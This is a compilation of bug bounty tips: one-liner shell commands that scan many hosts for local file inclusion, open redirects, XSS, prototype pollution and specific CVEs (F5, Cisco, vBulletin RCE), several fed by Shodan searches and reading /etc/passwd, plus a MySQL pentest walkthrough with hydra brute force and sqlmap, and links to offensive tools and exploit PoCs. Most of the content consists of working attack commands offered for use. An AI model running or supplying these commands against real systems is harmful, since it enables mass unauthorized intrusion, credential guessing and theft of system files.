Bug bounty Tips

You can now passively enumerate all endpoints of a website with katana. (No need waybackurls) Example: echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints You can then check the status of these endpoints or filter in order to find new vulnerabilities: Example: echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints

Awesome One-liner Bug Bounty : > A collection of awesome one-liner scripts especially for bug bounty. This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome. ## Definitions This section defines specific terms or placeholders that are used throughout one-line command/scripts. - 1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1. - 1.2. "HOSTS.txt" contains criteria 1.1 with more than one in file. - 2.1. "URL" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol. - 2.2. "URLS.txt" contains criteria 2.1 with more than one in file. - 3.1. "FILE.txt" or "FILE{N}.txt" means the files needed to run the command/script according to its context and needs. - 4.1. "OUT.txt" or "OUT{N}.txt" means the file as the target storage result will be the command that is executed. --- ### Local File Inclusion > @dwisiswant0

gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

### Open-redirect > @dwisiswant0

export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

> @N3T_hunt3r

cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null

### XSS > @cihanmehmet

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt

> @fanimalikhack

waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt

> @oliverrickfors

cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

### Prototype Pollution > @R0X4R

subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"

### CVE-2020-5902 > @Madrobot_

shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done

### CVE-2020-3452 > @vict0ni

while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt

### CVE-2022-0378 > @7h3h4ckv157

cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done

### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution > @Madrobot_

shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

### Find JavaScript Files > @D0cK3rG33k

Penetration Testing on MySQL Port 3306 MySQL is a popular open-source relational database management system (RDBMS) that is widely used in web applications. As a penetration tester, it's essential to identify vulnerabilities in MySQL to prevent unauthorized access to sensitive data. In this article, we'll explore how to conduct a penetration test on MySQL Port 3306. Initial Reconnaissance Before we begin, let's perform some initial reconnaissance to gather information about the target system. We can use tools like Nmap to scan the target IP address and identify open ports. nmap -sT 192.168.1.100 The output should reveal that port 3306 is open, indicating that MySQL is running on the target system. MySQL Version Scanning Next, we'll use Nmap to scan the MySQL version. We can use the -sV option to enable version detection. nmap -sV 192.168.1.100 -p 3306 The output should display the MySQL version, which can help us identify potential vulnerabilities. Authentication Bypass Now, let's try to bypass authentication using the mysql command. We can use the -h option to specify the target IP address and the -u option to specify the username. mysql -h 192.168.1.100 -u root If the password is not set or is weak, we might be able to gain access to the MySQL database without authentication. SQL Injection SQL injection is a common vulnerability in web applications that use MySQL. We can use tools like SQLMap to identify SQL injection vulnerabilities. sqlmap -u "http://192.168.1.100/vulnerable.php?id=1" --dbms=mysql SQLMap will attempt to inject SQL code to extract sensitive data from the database. Brute Force Attack If we're unable to bypass authentication or find an SQL injection vulnerability, we can try a brute force attack using tools like Hydra. hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.100 mysql Hydra will attempt to guess the password using a dictionary attack. Conclusion I've demonstrated how to conduct a penetration test on MySQL Port 3306. We've shown how to perform initial reconnaissance, scan the MySQL version, bypass authentication, identify SQL injection vulnerabilities, and launch a brute force attack. Remember to always conduct penetration tests with permission from the system owner and to follow applicable laws and regulations.

Hackerone got hacked! How can I steal your POC? 🥷🏻 • Weakness - Sensitive Information Disclosure • Bounty - $15,000 • CC - Hasyim Critical bugs directly upstream (Hackerone) as a bug bounty platform : https://kresec.medium.com/hackerone-got-hacked-how-can-i-steal-your-poc-01a9132c5aeb

the new feature of burpsuite Bambda is so cool if u know best way to use this it will give you all owsp top10 vulnerability param pattern same like gf pattren but with beautiful coloured gui must try this.. https://github.com/PortSwigger/bambdas/blob/main/Filter/Proxy/HTTP/FilterHighlightAnnotateOWASP.bambda https://github.com/BugBountyzip/Bambdas/tree/main https://marketplace.bugbounty.zip/BurpBambdas/#

#Threat_Research 1. Novel Pipeline Vulnerability; Rust Found Vulnerable https://www.legitsecurity.com/blog/artifact-poisoning-vulnerability-discovered-in-rust 2. MSI - Masquerading as a Software Installer https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer

#Malware_analysis 1. DuckLogs Malware https://blog.cyble.com/2022/12/01/ducklogs-new-malware-strain-spotted-in-the-wild 2. A PoC ransomware sample to test out your ransomware response strategy https://github.com/hazcod/ransomwhere

#Threat_Research #Blue_Team_Techniques 1. Threatest - CLI and Go framework for end-to-end testing threat detection rules https://github.com/DataDog/threatest 2. Detect Tactics, Techniques & Combat Threats https://github.com/rabobank-cdc/DeTTECT

#tools #Offensive_security 1. PrintNotifyPotato - PrintNotify COM service for lifting rights (Windows 10, 11, Server 2012 - 2022) https://github.com/BeichenDream/PrintNotifyPotato 2. Script for generating revshells https://github.com/4ndr34z/shells 3. PoC Implementation of a TRUE call stack spoofer https://github.com/klezVirus/SilentMoonwalk

#Threat_Research Pre-Auth RCE with CodeQL in Under 20 Minutes https://frycos.github.io/vulns4free/2022/12/02/rce-in-20-minutes.html

#exploit 1. CVE-2022-2650: Brute Force on wger workout application v2.0 https://github.com/HackinKraken/CVE-2022-2650 2. CVE-2022-44721: Crowdstrike Falcon Uninstaller https://github.com/purplededa/CVE-2022-44721-CsFalconUninstaller

#Malware_analysis 1. ₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware 2. Blowing Cobalt Strike Out of the Water With Memory Analysis https://unit42.paloaltonetworks.com/cobalt-strike-memory-analysis

#tools #Offensive_security 1. HTB: CarpeDiem https://0xdf.gitlab.io/2022/12/03/htb-carpediem.html 2. SysmonEoP - PoC for arbitrary file delete/write in Sysmon (CVE-2022-41120/CVE-2022-XXXXX) https://github.com/Wh04m1001/SysmonEoP 3. Nim DLL Sideloading/proxying https://github.com/byt3bl33d3r/NimDllSideload

#reversing 1. GL.iNET GL-MT300N-V2 Router Vulnerabilities and Hardware Teardown https://boschko.ca/glinet-router 2. Hacking the router firmware used by (Telia) TG799vac Xtream v17.2-MINT delivered from Technicolor https://github.com/wuseman/TG799VAC-XTREME-17.2-MINT

#Threat_Research 1. HTTP Desync Attack (Request Smuggling) - Mass Account Takeover at a Cryptocurrency based asset and 121 other websites https://github.com/AnkitCuriosity/Write-Ups/blob/main/HTTP%20Desync%20Attack%20(Request%20Smuggling).md 2. Visual Studio Code: RCE https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m